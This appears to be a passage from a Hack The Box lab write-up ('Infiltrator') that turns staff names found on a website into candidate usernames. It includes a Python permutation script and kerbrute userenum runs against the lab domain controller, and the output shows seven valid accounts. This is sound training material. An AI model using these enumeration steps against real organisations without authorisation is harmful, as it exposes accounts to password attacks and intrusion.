Username_Enumeration
Possible usernames found in the Testimonials section of the target web server
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ cat names.txt
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan RodriguezCreated a file, names.txt, containing possible users
Username Generator V2
#!/usr/bin/env python3
import argparse
def generate_root_list_lowercase(wordlist):
names = []
with open(wordlist) as f: # Open file for processing
for line in f:
names.append(line.strip().lower())
return names
def lowercase_transformations(names):
for line in names:
print(line.split()[0]) # john lennon -> john
print(line.split()[1]) # john lennon -> lennon
print(line[0] + '.' + line.split()[1]) # john lennon -> j.lennon
print(line[0] + '-' + line.split()[1]) # john lennon -> j-lennon
print(line[0] + '_' + line.split()[1]) # john lennon -> j_lennon
print(line[0] + '+' + line.split()[1]) # john lennon -> j+lennon
print(line[0] + line.split()[1]) # john lennon -> jlennon
print(line.split()[0]+line.split()[1]) # john lennon -> johnlennon
print(line.split()[1]+line.split()[0]) # john lennon -> lennonjohn
print(line.split()[0] + '.' + line.split()[1]) # john lennon -> john.lennon
print(line.split()[1] + '.' + line.split()[0]) # john lennon -> lennon.john
def uppercase_transformations(names):
for line in names:
firstWord = line.split()[0]
secondWord = line.split()[1]
print(firstWord.capitalize()) # john lennon -> John
print(secondWord.capitalize()) # john lennon -> Lennon
print(firstWord[0].upper() + '.' + secondWord.capitalize()) # john lennon -> J.Lennon
print(firstWord[0].upper() + '_' + secondWord.capitalize()) # john lennon -> J_Lennon
print(firstWord[0].upper() + '-' + secondWord.capitalize()) # john lennon -> J-Lennon
print(firstWord[0].upper() + secondWord.capitalize()) # john lennon -> JLennon
print(firstWord.capitalize() + secondWord.capitalize()) # john lennon -> JohnLennon
print(secondWord.capitalize() + firstWord.capitalize()) # john lennon -> LennonJohn
print(firstWord.upper()) # john lennon -> JOHN
print(secondWord.upper()) # john lennon -> LENNON
print (firstWord.upper() + secondWord.upper()) # john lennon -> JOHNLENNON
parser = argparse.ArgumentParser(description='Python script to generate user lists for bruteforcing!')
parser.add_argument('-w', '--wordlist', type=str, metavar='wordlist', required=True, help="Specify path to the wordlist")
parser.add_argument('-u', '--uppercase', action='store_true', help='Also produce uppercase permutations. Disabled by default')
args = parser.parse_args()
names = generate_root_list_lowercase(args.wordlist)
lowercase_transformations(names)
if args.uppercase:
uppercase_transformations(names)A simple Python script to generate possible usernames
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 ~/Tools/username_gen_v2.py -w names.txt > possible_usernames.txtsaved as possible_usernames.txt
Additional
The naming convention that the target organization appears to use has been disclosed from the bruteforce attack earlier.
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 2
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Surnames file path: /usr/share/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]:
Output saved in results.txtCreating an additional wordlist, following the disclosed username convention
saved as results.txt
Kerbrute
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute userenum --dc dc01.infiltrator.htb -d INFILTRATOR.HTB ./possible_usernames.txt -t 200
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
2024/09/01 00:17:43 > Using KDC(s):
2024/09/01 00:17:43 > dc01.infiltrator.htb:88
2024/09/01 00:17:43 > [+] VALID USERNAME: k.turner@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: d.anderson@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: a.walker@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: o.martinez@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: e.rodriguez@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: m.harris@INFILTRATOR.HTB
2024/09/01 00:17:43 > [+] VALID USERNAME: l.clark@INFILTRATOR.HTB
2024/09/01 00:17:43 > Done! Tested 77 usernames (7 valid) in 0.100 secondsKerbrute found 7 valid domain users
Those are saved into a file; users.txt
Kerbrute (additional)
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute userenum --dc dc01.infiltrator.htb -d INFILTRATOR.HTB ./results.txt -t 200
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
2024/09/01 00:24:42 > Using KDC(s):
2024/09/01 00:24:42 > dc01.infiltrator.htb:88
2024/09/01 00:24:42 > [+] VALID USERNAME: d.ANDERSON@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: m.HARRIS@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: o.MARTINEZ@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: e.RODRIGUEZ@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: a.WALKER@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: l.CLARK@INFILTRATOR.HTB
2024/09/01 00:24:42 > [+] VALID USERNAME: k.TURNER@INFILTRATOR.HTB
2024/09/01 00:24:51 > Done! Tested 26000 usernames (7 valid) in 8.880 secondsSame result